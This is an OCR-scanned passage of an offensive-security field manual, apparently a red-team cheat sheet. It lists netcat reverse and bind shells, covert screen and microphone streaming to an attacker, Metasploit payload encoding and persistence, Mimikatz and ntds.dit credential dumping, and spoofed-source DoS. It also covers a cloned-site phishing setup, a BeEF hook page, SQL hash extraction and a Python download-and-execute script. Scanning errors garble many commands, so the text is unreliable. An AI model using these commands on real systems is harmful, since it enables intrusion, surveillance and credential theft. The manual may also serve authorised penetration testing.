$ nc -1 -p [port]
[filename]
2.
Connect to [TargetiP] and Retrieve [filename]
$ nc -w3 [TargetiP] [port]
[filename]
Push a [filename] to Listener:
Start Listener to pull [filename]
1.
$ nc -1 -p [port]
[filename]
Connect to [TargetiP] and push [filename]
2.
$nc -w3 [TargetiP] [port]
[filename]

BACKDOOR SHELLS
Linux Shell:
$ nc -1 -p [port] -e /bin/bash
Linux Reverse Shell:
$ nc [LocaliP] [port] -e /bin/bash
Windows Shell:
$ nc -1 -p [port] -e cmd.exe
Windows Reverse Shell:
$ nc [LocaliP] [port] -e cmd.exe

53

VLC STREAMING
# Use cvlc (command line VLC) on target to mitigate popups
CAPTURE AND STREAM THE SCREEN OVER

UDP

TO :

1234

# Start a listener on attacker machine
vlc udp://@:1234

OR # Start a listener that stores the stream in a file.
vlc udp://@:1234 :sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,
ab=128,channels=2,samplerate=44100):file{dst=test.mp4) :no-sout-rtp-sap
:no-sout-standard-sap :ttl=1 :sout-keep
# This may make the users screen flash. Lower frame rates delay the video.
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst= attackerip :1234) :no-sout-rtp-sap :no-soutstandard-sap :ttl=1 :sout-keep
CAPTURE AND STREAM THE SCREEN OVER HTTP

# Start a listener on attacker machine
vlc http://server.example.org:BOBO

-- OR # Start a listener that stores the stream to a file
vlc http://server.example.org:BOBO -sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,samp
lerate=44100):file{dst=test.mp4)
# Start streaming on target machine
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):http{mux=ffmpeg{mux=flv),dst=:8080/) :no-sout-rtp-sap :nosout-standard-sap :ttl=1 :sout-keep
CAPTURE AND STREAM OVER BROADCAST

# Start a listener on attacker machine for multicast
vlc udp://@ multicastaddr :1234
# Broadcast stream to a multicast address
vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):udp{dst= multicastaddr :1234) :no-sout-rtp-sap :no-soutstandard-sap :ttl=1 :sout-keep
CAPTURE AND RECORD YOUR SCREEN TO A F:ILE

vlc screen:// :screen-fps=25 :screen-caching=100
:sout=#transcode{vcodec=h264,vb=O,scale=O,acodec=mp4a,ab=128,channels=2,sam
plerate=44100):file{dst=C:\\Program Files (x86)\\VideoLAN\\VLC\\test.mp4)
:no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep
CAPTURE AND STREAM THE M:ICROPHONE OVER UDP
vlc dshow:// :dshow-vdev= 11 None" :dshow-adev="Your Audio Device 11
54

SSH
/etc/ssh/ssh known hosts
-/.ssh/known=hostssshd-generate
ssh keygen -t dsa -f /etc/ssh/ssh host dsa
ssh keygen -t rsa -f /etc/ssh/ssh=host=rsa

#System-wide known hosts
#Hosts user has logged into
#Generate SSH keys (DSA/RSA)
key
#Generate SSH DSA keys
key
#Generate SSH RSA keys

If already in ssh session, press SHIFT -C to configure tunnel
Port forwarding must be allowed on target
/etc/ssh/sshd_config - AllowTcpForwarding YES

TO ESTABLISH AN SSH CONNECTION ON DIFFERENT PORT
ssh root@2.2.2.2 -p 8222

SETUP

Xll

FORWARDING FROM TARGET, FROM ATTACK BOX RUN

xhost+
vi -/.ssh/config- Ensure 'ForwardXll yes'
ssh -X root@2.2.2.2

REMoTE PORT FORWARD ON

808 0 ,

FORWARD TO ATTACKER ON

4 43

ssh -R8080:12-.0.0.1:443 root@2.2.2.2.

LoCAL PORT FORWARD ON PORT
THROUGH SSH TUNNEL TO PORT

8080
3300

ON ATTACK BOX AND FORWARDS
ON INTERNAL TARGET

3. 3. 3. 3

ssh -18080:3.3.3.3:443 root@2.2.2.2

DYNAMIC TUNNEL USED IN CONJUNCTION WITH PROXYCHAINS .

ENSURE

/ETC/PROXYCHAINS. CONF IS CONFIGURED ON CORRECT PORT

(1080)

ssh -Dl080 root@2.2.2.2
In a separate terminal run:
proxychains nmap -sT -p80,443 3.3.3.3

55

METASPLOIT
msfconsole r file.rc
msfcli I grep exploit/window
rnsfencode 1
msfpayload h
show exploits
show auxiliary
show payloads
search string
info module
use module
show options
show advanced
value
set option
sessions -v

Load resource file
List Windows exploits
List available encoders
List available payloads
Display exploits
Display auxiliary modules
Display payloads
Search for string
Show module information
Load exploit or module
Displays module options
Displays advanced options
Sets a value
List session: -k # (kill)
-u # (upgrade to Meterpreter)
Run Meterpreter script on all
sessions
List all jobs (-k # - kill)
Run exploit as job
Pivoting
Load 3rd party tree
Live Ruby interpreter shell
SSL connect (NC clone I
Add route ·through session (pivot)
Advanced option allows for multiple
shells
Enables logging

sessions -s script
jobs -1
exploit -j
nmask
route add ip
sid
loadpath /home/modules
irb
connect -s ip 443
route add ip
mask
session id
exploit/multi/handler set
ExitOnSession False
set ConsoleLogging true (also
SessionLogging)

CREATE ENCODED METERPRETER PAYLOAD

(FOR

LINUX:

-T ELF

-o

CALLBACK)
./msfpayload windows/meterpreter/reverse tcp
ip
./msfencode -t exe -o callback.exe -e x86/shikata_ga nai -c 5

port

CREATE BIND METERPRETER PAYLOAD
./msfpayload windows/meterpreter/bir.d_tcp
cb.exe

ip

port

CREATE ENCODED PAYLOAD USING MSFVENOM USING EXE TEMPLATE
./msfvenorn --payload
--format exe
template calc.exe -k --encoder x86/shikata ga nai -i 5
callback.exe

56

X

R I

START MSF DB

(BT5

=

MYSQL,

KAL:r =

POSTGRESQL)

/etc/rc.d/rc.mysqld start
msf db_create root:pass@localhost/metasploit
msf load db mysql
msf db connect root:pass@localhost/metasploit
msf db=import nmap.xml
Kali --# service postgresql start
# service metasploit start

PASS A SHELL
msf
msf
msf
msf
msf
msf

use
set
set
set
set
set

(BY DEFAULT WJ:LL LAUNCH NOTEPAD AND :INJECT)

post/windows/manage/multi meterpreter inJect
IPLIST attack ip
LPORT callback port
PIDLIST PID to inject, default creates new notepad
PAYLOAD windows/meterpreter/reverse_tcp
SESSION meterpreter session ID

HTTP BANNER SCAN ON :INTERNAL NETWORK
msf
msf
msf
msf
msf
msf

route add ip/range
netmask
meterpreter ID
use post/multi/gather/ping sweep
# Set options and run
use /auxiliary/scanner/portscan/tcp
# Set options and run
hosts-u-S x.x.x -R
#Searches for x.x.x.' and sets
# RHOSTS
use auxiliary/scanner/http/http version
# Set options and run
services -v -p 80-S x.x.x -R #Displays IPs x.x.x.' with port
# 80 open

57

METERPRETER
List available commands
Display system info
List processes
List current PID
Upload file
Download file
Interact with registry
Revert to original user
Drop to interactive shell
Migrate to another PID
Background current session
Start/Stop/Dump keylogger
Execute cmd.exe and interact
Execute cmd.exe as hidden process
and with all tokens
Dumps local hashes
Executes script
(/scripts/meterpreter)
Port forward 3389 through session.
Rdesktop to local port 443

help
sysinfo
ps
getpid
upload file C:\\Program\ Files\\
download file
reg command
rev2self
shell
migrate PID
background
keys can (startjstopjdumpj
execute -f cmd.exe -i
execute -f crnd.exe -i -H -t
has dump
run script
port fwd [add I delete] L 1r.o.o.1
443 -r 3.3.3.3 -p 3389

1

PRIVILEGE ESCALATION
use priv
getsystem

IMPERSONATE TOKEN (DROP TOKEN WILL STOP IMPERSONATING)
use incognito
list tokens -u
impersonate token domain\\user

NMAP
1.
2.
3.
4.
5.

6.

THROUGH METERPRETER SOCKS PROXY
msf
msf
msf

sessions
#Note Meterpreter ID
route add 3.3.3.0 255.255.255.0 id
use auxiliarJ/server/socks4a

rnsf

run

Open new shell and edit /etc/proxychains.conf
i.
#proxy_ dns
ii.
#socks4 1r.0.0.1
9050
iii.
socks4
1. 1.1.1 1080
Save and Close conf fi:e
proxychains nmap -sT -Pn -p80,:35,s45 3.3.3.3

RAILGUN - WINDOWS API CALLS TO POP A MESSAGE BOX
irb
client. railgun. user32. t.jessageBoxA ( 0, "got", 11 JOU", "HB

58

I

CREATE PERSXSTENT WrNDOWS SERVICE
msf
msf·
msf
msf.
msf.·
msf
msf.

use
set
set
set
set
set
set

post/windows/manage/persistence
LHOST attack ip
LPORT callback port
PAYLOAD_TYPE TCPIHTTPIHTPS
REXENAHE filename
SESSION meterpreter session id
STARTUP SERVICE

GATHER RECENTLY ACCESSED FXLES AND WEB LXNKS
meterpreter

run post/windows/gather/dumplinks

SPAWN NEW PROCESS AND TREE C: \
execute -H -f cmd.exe -a '/c tree /F /A c:\

59

C:\temp\tree.txt'

ETTERCAP
WITH FILTER
ettercap.exe -I iface -M arp -Tq -F file.ef MACs I IPs I Ports
t1ACs I IPs I Ports
#i.e.: I 180,443 I I
anJ t1AC, anj IP, ports 80,443

ENTIRE SUBNET WITH APPLIED FILTER
ettercap -T -M arp -F

filter

II II

SWITCH FLOOD
ettercap -TP rand flood

ETTERCAP FILTER
COMPILE ETTERCAP FILTER
etterfilter filter.filter -o out.ef

SAMPLE FILTER if lip.proto
drop I I;
hllll;

KILLS VPN TRAFFIC AND DECODES HTTP TRAFFIC

UDP && udp.dst

500) I

}

if I ip. src
' ip ' ) (
if ltcp.dst
80) (
if lsearchiDATA.data, "Accept-Encoding")) (
replace("Accept-Encoding","Accept-Rubbish!");
rnsg(''Replaced Encoding\n'');

60

MIMIKATZ
1.
2.
3.
4.
5.

Upload mimikatz.exe and sekurlsa.dll to target
execute mirnikatz

mimikatz# privilege: :debug
mimikatz# injeet::proeess lsass.exe sekurlsa.dll
mimikatz# @getLogonPasswords

HPING3
DoS

FROM SPOOFED

hping3

targetiP

IPs
--flood --frag --spoof

ip

--destport

#

--syn

ARPING
ARP SCANNER
./arping -I eth# -a

# arps

WINE
COMPILE

EXE IN

BACKTRACK

ed /root/.wine/drive e/HinGW/bin
wine gee -o file.exe /tmp/ eode.e
wine

file.exe

GRUB
CHANGE ROOT PASSWORD
GRUB Henu:Add 'single' end of kernel line. Reboot. Change root pass. reboot

HYDRA
ONLINE BRUTE FORCE
hydra -1 ftp -P words -v

targetiP

ftp

61

JOHN THE RIPPER
CRACKING WITH A WORDLIST
$ ./john -wordfile:pw.lst -format: format

hash.txt

FORMAT EXAMPLES
john
john
john
$ john

username:SDbsuge8iC58A
$1$12345678$aiccj83HRD8o6ux1bVx"D1
A9993E364-06816A8A3E25"1-850C26C9CDOD89D

# For
replace $NETLM with $NETLMv2
$ john
$NETLt1$112233445566""88$0836F0858124F338958-5F81951905DD2F85252CC-318825
username:$NETLt1$ll2233445566""88$0836F0858124F338958"5F81951905DD2F85252CC"
318825
username:$NETLt1$112233445566""88$0836F0858124F338958-5F81951905DD2F85252CC"
318825:::::::
# Exactly 36 spaces between USER and HASH (SAP8 and SAPG)
$ john
ROOT
$8366A4E9E68"2C80
username:ROOT
$8366A4E9E68"2C80
$ john
$1194E38F1489F3F8DA18181F14DE8"0E"8DCC239
ROOT
username:ROOT
$1194E38F1489F3F8DA18181F14DE8-0E-8DCC239
$ john
$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb"453dfe30-89
username:$SHA1p$salt$59b3e8d63-cf9"edbe2384cf59cb-453dfe30-89
$ john
$zip$'0'1'8005b1b"d07""08d'dee4
username:$zip$'0'1'8005b1b-d0"-"08d'dee4

PASSWORD WORDLIST
GENERATE WORDLIST BASED OFF SINGLE WORD
#Add lower(@), upper(,),
crunch 12 12 -t baseword@,%'

and symbol( I to the end of the word
wordlist.txt

Use custom special character set and add 2 numbers then special character
maskprocessor
baseword?d?d?l
wordlist.txt

62

VSSOWN
1.
2.

3.

Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
Create a new Shadow Copj
a.
cscript vssown.vbs /start (optional)
b.
cscript vssown.vbs /create
Pull the following files frorr. a shadow copj:
a.
COpj
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopj[X]\windows\
ntds\ntds.dit .
b.
copj
\\?\GLOBALROOT\Device\Harddisf:VolumeShadowCopj[X]\windows\
Sjstem32\config\SYSTEM .
C.

4.
5.
6.

8.

9.

10.

[2l

COpj

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopj[X]\windows\
sjstem32\con:'ig\SAt1 .
Copj files to attack box.
Download tools:
dump_hash.zip
Configure and Make source code for libesedb from the extracted package
a.
cd libesedb
b.
chmod +x configure
c.
./configure && make
Use esedbdumphash to
the datatable from ntds.dit.
a.
cd esedbtools
b.
. I esedbdumphash .. I . . I ntds. di t
8a.Use dsdump.pj to dump hashes from datatable using bootkej from
SYSTEt1 hive
a.
cd .. I . . I creddump/
b.
pjthon . /dsdurr.p.pj .. /SYSTEtc
.. /libesedb/esedbtools/ntds.dit.export/datatable
8b.Use bkhive and samdump2 to dump hashes from SN1 using bootkej from
SYSTEt1 hive.
a.
bkhive SYSTEM kej.txt
b.
samdump2 SN1 kej. txt
Dump historical hashes
a.
pjthon ./dsdumphistorj.pj .. /sjstem
.. /libesedb/esedbtools/ntds.dit.export/datatable

63

FILE HASHING
HASH LENGTHS
t1D5
SHA-1
SHA-256
SHA-512

16
20
32
64 bjtes

SOFTWARE HASH DATABASE

# dig +short

Result

=

''

md5 .md5.dshield.org TXT

filename

I

source '' i.e. ''cmd.exe I NIST''

MALWARE HASH DATABASE
http: I /www.

org/ Services/t1HR

# dig +short [t1D51 SHA-1] .malware.hash.cjmrc.J.com TXT
Result = last seen timestamp
AV detection rate
Convert timestamp= perl-e 'print scalar localtime( timestamp ) , ''\n'''

FILE METADATA SEARCH
https://fileadvisor.bit9.com/services/search.aspx

SEARCH VIRUSTOTAL DATABASE
https://www.virustotal.com/#search

64

COMMON USER-AGENT STRINGS
Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1; SV1)
Mozilla/ 4. 0 (compatible;
7. 0; Windows
NT 5.1; SV1; .NET CLR 2.0.50-2 7 )
Mozilla/4.0 (compatible; MSIE 8.0; Windows
NT 6.0; Trident/4.0; Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1)
; .NET CLR 3.5.30 7 29)
Mozilla/ 5. 0 (compatible;
9. 0; Windows
NT 6.1; Trident/5.0)
Mozilla/5.0 (compatible;
9.0; Windows
NT 6.1; WOW64; Trident/5.0)

IE 6.0/WinXP 32-bit

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)
Gecko/20100101 Firefox/5.0
Mozilla/5.0 (Windows NT 5.1; rv:13.0)
Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:1'.01
Gecko/20100101 Firefox/1'.0
Mozilla/5.0 (X11; Ubuntu; Linux x86 64;
rv:17.0) Gecko/20100101 Firefox/1-.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.-;
rv: 17. 0) Gecko/20100101 Firefox/1 7 .0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;
rv:17.0) Gecko/20100101 Firefox/1'.0

Firefox

Mozilla/5.0 (Windows NT 5.1)
AppleWebKit/53'.11 (KHTML, like Gecko)
Chrome/23.0.1271.9- Safari/53-.11
Mozilla/5.0 (Windows NT 6.1)
AppleWebKit/53 7 .11
like Gecko)
Chrome/23.0.12-1.9- Safari/53-.11
Mozilla/5.0 (X11; Linux x86 64)
AppleWebKit/53' .11
like Gecko)
Chrome/23.0.1271.9' Safari/53 7 .11
Mozilla/5.0 (Macintosh; Intel Mac OS X
10 8 2) AppleWebKit/537.11 (KHTML, like
Chrome/23.0.12-1.101 Safari/53'.11
Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/535.1 (KHTML, like Gecko)
Chrome/13.0.782.112 Safari/535.1

Chrome Generic/WinXP

Mozilla/5.0 (Macintosh; Intel Mac OS X
10
5) AppleWebKit/536.26.17 (KHTML, like
Version/6.0.2 Safari/536.26.17

Safari 6.0/MacOSX

Mozilla/5.0 (iPad; CPU OS 6 0 1 like Mac OS
X) AppleWebKit/536.26 (KHTML,-like Gecko)
Version/6.0 Mobile/10A523 Safari/8536.25
Mozilla/5.0 (iPhone; CPU iPhone OS 6 0 1
like
OS X) AppleWebKit/536.26 (KHTML,
like Gecko) Version/6.0 Mobile/10A523
Safari/8536.25
Mozilla/5.0 (Linux; U; Android 2.2; fr-fr;
Desire A8181 Build/FRF91) App3leWebKit/53.1
like Gecko I Version/ 4. 0 Mobile
Safari/533.1

Mobile Safari 6.0/iOS

67

IE

32-bit

IE 8.0/WinVista 32-bit

IE 9.0/Win- 32-bit
IE 9.0/Win- 64-bit

64-bit

Firefox 13.0/WinXP 32-bit
Firefox

64-bit

Firefox 1-.o/Linux
Firefox 1'.0fMacOSX 10.Fire fox 1'.

10.8

Chrome Generic/Win'

Chrome Generic/Linux

Chrome

Chrome 13.0/Win' 64-bit

(iPad)

Mobile Safari 6.0/iOS
(iPhone)

Hobile Safari 4.0/Android

HTML
HTML

BEEF HOOK WITH EMBEDDED FRAME

!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
html
head.
title Campaign Title· /title
script
var commandModuleStr = ' script src= 111 + window.location.protocol +
'II' + window. location. host + ':8080/hook.js"
type="text/javascript" \/script.';
document.write(commandModuleStr);
//Site refresh=window.setTimeout(function() {window.location.href='http://ww
w.google.com/'},20000);
/script.
/head
frameset rows="*,lpx"
frame src="http://www.google.com/" frameborder=O
noresize=''noresize'' I
frame src=''/e'' frarneborder=O scrolling=no noresize=noresize ; ,
/frameset
/html

EMBEDDED JAVA APPLET

(*

PLACE WITHIN  TAG)

applet archive=''legit.jar'' code=''This is a legit applet'' width=''l''
height="l"
/applet

EMBEDDED IFRAME
iframe src="http://1.1.1.1 11 width="O" height="O" frameborder="O"

tabindex=''-1'' title=''ernpty'' style=visibility:hidden;display:none''
/iframe

FIREFOX TYPE CONVERSIONS
ASCII
Base64
ASCII
URI

Base64
ASCII
URI
ASCII

javascript:btoa(''ascii str'')
javascript:atob("base64==")
javascript:encodeURI('' ·script ''}
javascript:decodeURI("%3cscript%3E")

WGET
CAPTURE SESSION TOKEN
wget -q --save-cookies=cookie.txt --keep-session-cookies --postdata="username: admin&password=pass&Login=Login" http: I I .. url ,. I login. php

68

CURL
GRAB HEADERS AND SPOOF USER AGENT

curl -I -X HEAD -A
http:// ip

(compatible; HSIE ".01; Windows NT 5.0)"

SCRAPE SXTE AFTER LOGXN

curl -u user:pass -o outfile https://login.bob.com

FTP
curl ftp://user:pass@bob.com/directory/
SEQUENTXAL LOOKUP

curl http://bob.com/file[l-10] .txt

BASIC AUTHENTICATION USING APACHE2
The steps below will clone a website and redirect after 3 seconds to
another page requiring basic authentication. It has proven very useful for
collecting credentials during social engineering engagements.
Start Social Engineering Toolkit (SET)
/pentest/exploits/set/./set
2.
Through SET, use the 'Website Attack Vector' menu to clone your
preferred website. ' Do not close SET '
3.
In a new terminal create a new directory (lowercase L)
mkdir /var/www/1
4.
Browse to SET directory and copy the cloned site
cd /pentest/exploits/set/src/web clone/site/template/
cp index.html /var/www/index.html
cp index.html /var/www/1/index.html
5.
Open /var/www/index.html and add tag between head tags
meta http-equiv=''refresh''
content-"3;url-http:// domainlip /1/index.html"/
6.
Create blank password file to be used for basic auth
touch /etc/apache2/.htpasswd
Open /etc/apache2/sites-available/default and add:
Directory /var/www/1
AuthType Basic
AuthName "PORTAL LOGIN BANNER"
AuthUserFile /etc/apache2/.htpasswd
Require user test
/Directory
8.
Start Apache2
/etc/init.d/apache2 start
9.
Start Wireshark and add the filter:
http.authbasic
10. Send the following link to your target users
http:// domainlip /index.html
1.

69

AUTOMATED WEB PAGE SCREENSHOTS
NMAP WEB PAGE SCREENSHOTS[9]
Install dependencies:
wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0 rc1static-i386.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0 rc1-statlc-i386.tar.bz2
cp wkhtmltoimage-i386 /usr/local/bin/
Install Nmap module:
git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
cp http-screenshot.nse /usr/local/share/nmap/scripts/
nmap --script-updatedb
OS/version detection using screenshot script (screenshots saved as .png):
nmap -A -script=http-screenshot -p80,443
1.1.1.0/24 -oA nmapscreengrab
Script will generate HTML preview page with all screenshots:
#!/bin/bash
printf " HTHL.- BODY BR "
preview.html
ls -1 '.png I awk -F : ' {print $1":"$2"\n BR- IMG SRC=\""$1"%3A"$2"\"
width=400 BR BR ")'
preview. html
printf " /BODY /HTML. "
preview. html

PEEPINGTOM WEB PAGE SCREENSHOTS
Install Dependencies:
Download Phantomjs
https://phantomjs.googlecode.com/files/phantomjs-1.9.2-linux-x86_64.tar.bz2
Download PeepingTom
git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git
Extract and copy phantomjs from phantomjs-1.9.2-linux-x86 64.tar.bz2 and
copy to peepingtom directory
Run PeepingTom
python peepingtom.py http:// mytarget.com

70

SQLMAP
GET REQUEST
./sqlmap.py -u "http:// url ?id=1&str=val"

POST REQUEST
./sqlmap.py -u "http:// url " --data="id=1&str=val"

SQL INJECTION AGAINST SPECIFIC PARAMETER WITH DB TYPE SPECIFIED
./sqlmap.py -u ''http:// url '' --data=''id=l&str=val'' -p ''id''
-b --dbms=" mssqllmysqlloraclelpostgres "

SQL INJECTION ON AUTHENTICATED SITE
1.
Login and note cookie value (cookie1=val1, cookie2=val2)
./sqlrnap.py -u ''http://· url '' --data=''id=l&str=val'' -p ''id''
--cookie=''cookiel=vall;cookie2=val2''

SQL INJECTION AND COLLECT DB VERSION 1 NAME 1 AND USER
./sqlmap.py -u "http:// url " --data="id=1&str=val" -p "id" -b --current-db
--current-user

SQL INJECTION AND GET TABLES OF DB=TESTDB
./sqlmap.py -u "http:// url " --data="id=1&str=val" -p "id" --tables -D
testdb 11

11

•

SQL INJECTION AND GET COLUMNS OF USER TABLE
./sqlrnap.py -u "http:// url " --data="id=l&str=val" -p "id 11 --columns -T
"users"

71

_,

N

MS-SQL
SELECT @@version
EXEC xp_msver
EXEC master .. xp_cmdshell 'net user'
SELECT HOST_ NA11E ()
SELECT DB_NA11E I)
SELECT name FROM master .. sysdatabases;
SELECT user name()
SELECT name FROM master .. sjslogins
SELECT name FROM master .. sjsobjects WHERE
Xtjpe= 'U';
SELECT name FROM SjScolumns WHERE id-(SELECT
id FR0t1 SJSObj ects WHERE name- 'mjtable' ) ;

DB version
Detailed version info
Run OS command
Hostname & IP
Current DB
List DBs
Current user
List users
List tables
List columns

SYSTEM TABLE CONTAINING INFO ON ALL TABLES
SELECT TOP 1 TABLE NAME FROl1 INFORl1ATION SCHEt1A. TABLES

LIST ALL TABLES/COLUMNS
SELECT name FROl-1 Sjscol-:;:r.ns WHERE id

(SELECT id FROM Sjsobjects WHERE

name= 'mjtable')
PASSWORD HASHES

(2005)

SELECT name, password hash FROM master.sjs.sgl logins

POSTGRES

SELECT
SELECT
SELECT
SELECT
SELECT
SELECT

inet server_addr()
current database();
datname FROM pg database;
user;
username FROM pg_user;
username,passwd FROM pg shadow

Hostname & IP
Current DB
List DBs
Current user
List users
List password hashes

LIST COLUMNS
SELECT relname, A.attnaxe FROl1 pg_class c, pg_namespace N, pg_attribute A,
pg_tjpe T WHERE (C.relkind-'r') AND
AND
(A.attrelid-C.oid) AND (A.atttjpid-T.oid) AND (A.attnum 0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public')

LIST TABLES
SELECT c.relname FROM pg_catalog.pg_class cLEFT JOIN
pg catalog.pg namespace n ON n.old - c.relnamespace WHERE c.relkind IN
( 'r','') AND n.nspnarne NOT IN ( 'pg catalog', 'pg toast') AND
pg catalog.pg table is visible(c.;id)

MYSQL
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT

@@version;
@@hostname;
database();
distinct (db) FROl1 mjsql.db;
user();
user FROM mJsql.user;
host,user,password FROM mJsql.user;

LIST ALL TABLES

DB version
Hostname & IP
Current DB
List DBs
Current user
List users
List password hashes

& COLUMNS

SELECT table schema, table name, column_ name FR0t1
information scherna.columns WHERE
table schema != 'rnysql' AND table schema != 'information schema'

EXECUTE OS COMMAND THROUGH MYSQL
osql -S
passr''

ip , port

-U sa -P pwd -Q "exec xp cmdshell

'net user /add user

READ WORLD-READABLE FILES
UNION ALL SELECT LOAD FILE( '/etc/passwd');

WRITE TO FILE SYSTEM
SELECT '

FROl1 mjtable INTO dumpfile '/tmp/ somefile';

ORACLE
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT
SELECT

• FROM v$version;
version FROM v$instance;
instance name FROM v$instance;
name FROM v$database;
DISTINCT owner FROM all tables;
user FROM dual;
username FROM all users ORDER BY

DB version
DB version
Current DB
Current DB
List DBs
Current user
List users

username;
SELECT column name FR0l1 all tab columns;
SELECT table name FROM all tables;
SELECT name, -password, astatus FROt1 SJS.user$;

List columns
List tables
List password hashes

LIST DBAs
SELECT DISTINCT grantee FR0t1 dba SfS_prlvS WHERE ADlHN OPTION

'4

I

YES I;

"'

-l

PYTHON
PYTHON PORT SCANNER
import socket as sk
for port in range (1, 1024):
trj:
socket ( sk .AF_ INET, sk. SOCK_ STRE.Z\t1)
s.settimeout(1000)
s. connect ( ('
0. 0. l ' , port) )
print '%d:OPEN' % (port)
s.close
except: continue

PYTHON BASE64 WORDLIST
#!/usr/bin/pjthon
import base64

filel=open(''pwd.lst'',''r'')
file2=open(''b64pwds.lst'',''w'')
for line in filel:

clear= "administrator:"+ str.strip(line)
new= base64.encodestring(clear)
file2.write(new)

CONVERT WINDOWS REGISTRY HEX FORMAT TO READABLE ASCII
import binascii,

SJS,

string

dataFormatHex
binascii.a2b hex(SJS.argv[i])
output = ''''
for char in dataFormatEex:
if char in string.printable: output += char
1 else: output += ''.''

• print ''\n'' + output

READ

ALL FILES IN FOLDER AND SEARCH FOR REGEX

import glob, re
for msg in glob.glob('/tmp/' .txt'):
filer
open I (msg), 'r' I
data
fi1er.read()
message= re.findall(r' message (.'?) /message ',
print ''File %s contains %s'' % (str(msg) ,message)
fi1er.c1ose()

data,re.DOTALL)

SSL ENCRYPTED SIMPLEHTTPSERVER
Create SSL cert (follow prompts for customization)
openssl req -new -x509 -keyout cert.pem -out cert.pern -days 365 -nodes
Create httpserver.pj
import BaseHTTPServer,SimpleHTTPServer,ssl
cert

=

''cert.pem''

httpd
BaseHTTPServer.HTTPServer( ('192.168.1.10' ,443),
Simp1eHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap socket(httpd.socket,certflle=cert,server side=True)
httpd.serve forever()

PYTHON HTTP SERVER
python -m SimpleHTTPServer 8080

PYTHON EMAJ:L SENDER (

*

SENDMAJ:L MUST BE INSTALLED)

#!/usr/bin/python
import smtplib, string
import os, time
os.system("/etc/init.d/sendmail start")
time.sleep(4)

HOST = ''localhost''
SUBJECT = "Email from spoofed sender"
TO = ''target@you.corn''
FROM= "spoof@spoof.com"
TEXT = "Message Body"
BODY = string.join( (
"From: %s" % FROH,

''To: %s'' % TO,
"Subject: %s" % SUBJECT ,
TEXT
) , "\r\n")
server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server. quit ()
time.sleep(4)
os.system("/etc/init.d/sendmail stop")

LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python
import urllib2, os
urls = [ 11 1.1.1.1'',"2.2.2.2"]
port = 11 80"
payload = "cb.sh"
for url in urls:
u = "http://%s:%s/%s" % (url, port, payload)
try:
r = urllib2.urlopen(u)
wfile = open{"/tmp/cb.sh", "wb")
wfile.write(r.read())
wfile. close ()
break

except: continue
if os.path.exists("/tmp/cb.sh"):
os.system("chmod -oo /tmp/cb.sh")
os. system ( "/tmp/cb. sh")

78

PYTHON HTTP BANNER GRABBER

(*

TAKES AN IP RANGE, PORT, AND

PACKET DELAY)
#!/usr/bin/python
import urllib2, sys, time
from optparse import OptionParser
parser= OptionParser()
parser.add option{''-t'', dest=''iprange'',help=''target IP range, i.e.
192.168.1.1-25")
parser.add option(''-p'', dest=''port'',default=''80'',help=''port, default=BO'')
parser.add=option("-d", dest="delay",default=".5",help="delay (in seconds),
default=.5 seconds")
(opts, args) = parser.parse_args()
if opts.iprange is None:
parser.error("you must supply an IP range")
ips = []
headers={}
octets= opts.iprange.split(' .')
start= octets[3] .split('-') [0]
stop = octets [ 3] . split ( '-' ) [ 1]
fori in range(int(start),int(stop)+1):
ips.append('%s.%s.%s.%d' % (octets[O],octets[1] ,octets[2],i))
print '\nScanning IPs: %s\n' % (ips)
for ip in ips:
try:
response= urllib2.urlopen('http://%s:%s' % (ip,opts.port))
headers[ip] = dict(response.info())
except Exception as e:
headers[ip] = "Error: " + str(e)

J

'

time.sleep(float(opts.delay))
for header in headers:
try:
print '%s : %s' % (header,headers[header] .get('server'))
except:
print '%s : %s' % (header,headers[header])

"9

SCAPY

* When you craft TCP packets with Scapy, the underlying OS will not
recognize the initial SYN packet and will reply with a RST packet. To
mitigate this you need to set the following Iptables rule:
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP
from scapy.all import *
ls ()
lsc ()
conf
IP(src=RandiP())
Ether(src=Randl1AC() I
ip=IP(src="l.l.l.l",dst="2.2.2.2")
tcp=TCP(dport="443")
data= 11 TCP data"
packet=ip/tcp/data
packet. show ( I
send(packet,count=l)
sendp(packet,count=2)
sendpfast(packet)
sr(packet)
srl(packet)
fori in range(O,lOOO): send (packet·)
sniff(count=lOO,iface=ethO)

SEND IPv6 ICMP

Imports all scapy libraries
List all avaiable protocols
List all scapy functions
Show/set scapy config
Generate random src IPs
Generate random src MACs
Specify IP parameters
Specify TCP parameters
Specify data portion
Create IP()/TCP() packet
Display packet configuration
